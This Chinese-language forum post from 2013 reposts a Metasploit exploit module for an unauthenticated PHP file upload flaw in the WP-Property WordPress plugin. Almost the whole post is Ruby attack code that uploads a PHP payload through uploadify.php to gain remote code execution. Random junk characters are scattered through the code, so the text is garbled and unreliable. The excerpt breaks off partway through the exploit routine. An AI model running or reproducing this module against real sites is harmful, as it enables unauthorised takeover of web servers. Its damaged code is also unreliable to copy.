标题: WordPress WP-Property PHP 文件上传漏洞 [打印本页] 作者: admin 时间: 2013-1-4 19:51 标题: WordPress WP-Property PHP 文件上传漏洞 WordPress WP-Property PHP 文件上传漏洞 3 P) ]3 _5 `6 C$ z2 p% N' w. | S' u6 w3 c/ M: e5 h ## # This file is part of the Metasploit Framework and may be subject to 0 D5 a" t* b/ i- t0 p& z: t! N; w2 T" g" S$ ^
# redistribution and commercial restrictions. Please see the Metasploit5 h0 T9 y. T; Z: @4 m' I
' Q" e3 ?% P2 C! \6 W; B U
# Framework web site for more information on licensing and terms of use. / |2 U& D. A9 n3 Z1 k, X * p, F) s. L x0 \ e" {# http://metasploit.com/framework/ ##3 H4 r1 n+ i0 C/ `% F
/ s4 [' w7 d% o / W) d5 d6 G+ ~- [5 ?3 i( N
) B0 k! @& {$ j: W9 D9 }$ z& q+ K
?2 D1 K0 {- n% q# b, i T! A1 l/ z$ u- }* @; c
require 'msf/core': k. m1 ?2 |7 h$ C' D
require 'msf/core/exploit/php_exe'+ j) {1 F2 b2 A2 ]8 K
5 _1 Z1 B: U/ v% f
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit:hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability', b8 u+ {: y7 D1 i+ R. c'Description' => %q{# B2 c; G4 H2 a( ^5 A' ~1 t
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' => # F/ Z& R1 T' y0 N: s# ~[ ; w0 _6 ]6 v- ]% x5 B# l$ A'Sammy FORGIT', # initial discovery* X1 c/ n( v. H4 l
'James Fitts <fitts.james[at]gmail.com>' # metasploit module, u, Q7 i8 J; C' b
], & j1 _: ]/ n( E% k; p'License' => MSF_LICENSE,( k, L4 i2 u, I/ T! l
'References' =>8 {8 Q0 v9 n. v6 L
[ ! j# f9 y3 }- j; Q+ P0 A+ O[ 'OSVDB', '82656' ], 8 O: D8 d7 @( W. F D[ 'BID', '53787' ],: I" e! u. W/ Q" M, h
[ 'EDB', '18987'], 3 _. G9 V! t/ u) R/ c7 i) |[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]) M& `* O5 G; T
],1 n6 I7 ~, e. i7 a; I
'Payload' => o0 B9 u* Z. g6 X{& [% C/ U* n" j* V) I/ C; l
'BadChars' => "\x00",+ Y9 s: t+ I3 W5 F$ D2 s. A$ E% q
},+ U7 N; o* B* W
'Platform' => 'php',% v7 @4 j" W. C( M/ J# |7 N
'Arch' => ARCH_PHP,+ |; @( a) I! C: c; g( e/ r: ~. u# V
'Targets' =>; @% f( b4 y, S2 L8 l
[ 2 R7 j) K7 y- {9 ^6 A+ x0 s& J[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],4 x/ w/ D. d6 R6 `2 ?/ F) C
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] # z4 y# @2 Q/ s9 L], 2 A0 u8 R: C3 B5 o'DefaultTarget' => 0,+ n l) k5 q8 a3 R4 x' m; M, W
'DisclosureDate' => 'Mar 26 2012'))4 K* d: Q+ G+ o; u5 X3 M
4 v0 g7 ?- h* T- Q, b
register_options() i5 B# v% ?4 f& G
[, i6 R; z' `: b% q, [2 P" n! U
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress']) * k% @/ h8 ]7 e3 i. d], self.class) ) A8 t# o/ ], k+ l! D- D! Q" Hend$ V9 |5 j+ ?! Q, \- R+ ]
9 V; |2 O- w( ~
def check - p5 r7 o6 {" ?/ a: Q- v+ iuri = target_uri.path 5 T' e4 ^' b% P) i! Vuri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',! U$ q5 O. b L& o! s
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php": q+ L. d6 M" }4 } B/ |* ?
}) . o+ B' ]# M" l4 D& r" Z( A; ?3 o# L# h! W$ g$ S
if not res or res.code != 2003 D2 x8 n2 X1 T% D1 Q
return Exploit::CheckCode::Unknown" o4 M. n( }* \ }
end- j h4 y5 D7 O5 b/ `$ |
7 @* l2 E9 A2 C- x& u- F
return Exploit::CheckCode::Appears 3 Y6 S4 F# n/ p6 E' q0 Tend 9 g4 j* y# O- Q$ v6 E. p$ H: L& D. \
def exploit , H+ {5 s; M$ r/ i, X3 Furi = target_uri.path $ y. g! P+ g+ N5 puri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)# a) Z- `8 T+ K
" {8 K* B' X$ M) x" h3 S5 idata = Rex::MIME::Message.new - k+ p& |7 ^0 ^; p2 s4 m3 ?data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")0 d* Z* u! {2 P z/ Y3 w5 Q, S
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"") 7 f6 T+ g: x4 ^0 }post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') 3 g- F8 l9 Y7 z- J+ [ f . E9 q7 M- L) h" o9 e/ tprint_status("#{peer} - Uploading payload #{@payload_name}") 9 K% V) I) m9 U, l0 t. H) jres = send_request_cgi({ 3 M1 r, r: a1 i8 q; q7 E7 i'method' => 'POST',* h' F8 Q! T( _1 s3 u
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php", / ?* [, m5 i% M p'ctype' => "multipart/form-data; boundary=#{data.bound}",& ]/ T& x3 U! y
'data' => post_data # z7 ^4 }. f$ X. c' T}) & k) t% N! n2 \3 d5 w% [' i 4 I, m$ V8 K/ j- T) ~if not res or res.code != 200 or res.body !~ /#{@payload_name}/. _5 n. i; U) A' C1 a$ s
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")9 n1 a9 g0 B1 y+ l( y, |. `
end# M5 l+ I; |: I# Q" @
; l8 \ C. r4 c7 }+ T2 h
upload_uri = res.body$ |$ P8 g; F* d1 ]% O+ K0 q